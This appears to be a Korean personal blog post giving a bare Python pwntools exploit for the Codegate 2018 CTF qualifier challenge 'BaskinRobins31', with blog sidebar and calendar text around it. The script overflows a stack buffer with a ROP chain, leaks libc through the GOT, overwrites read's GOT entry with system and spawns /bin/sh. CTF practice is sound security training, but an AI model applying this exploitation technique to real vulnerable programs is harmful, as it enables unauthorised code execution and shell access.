Codegate 2018 CTF Quals BaskinRobins31

System/Pwnable Practice 2019. 7. 24. 22:53

exploit.py

from pwn import *

p = process("./baskin")

write_plt = 0x4006d0
pppr = 0x40087a
read_plt = 0x400700
read_got = 0x602040
bss = 0x0000000000602090
distance = 0x7f01512ac070 - 0x7f01511eb440
binsh="/bin/sh\x00"

payload = "A"*(0xb0+8)
payload += p64(pppr)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(bss)
payload += p64(len(binsh))
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(read_got)
payload += p64(8)
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(bss)
payload += "A"*16
payload += p64(read_plt)

print p.recvuntil("(1-3)\n")

p.sendline(payload)
print p.recvuntil("Don't break the rules...:( \n")

read = u64(p.recv(8))
system = p64(read-distance)
p.send(binsh)
sleep(0.5)
p.sendline(system)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

SECCON CTF 2018 Classic (0)	2019.07.28
Defcon CTF 2015 r0pbaby (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27
Pico CTF 2013 ROP 1~4 (0)	2019.07.24

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Codegate 2018 CTF Quals BaskinRobins31

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바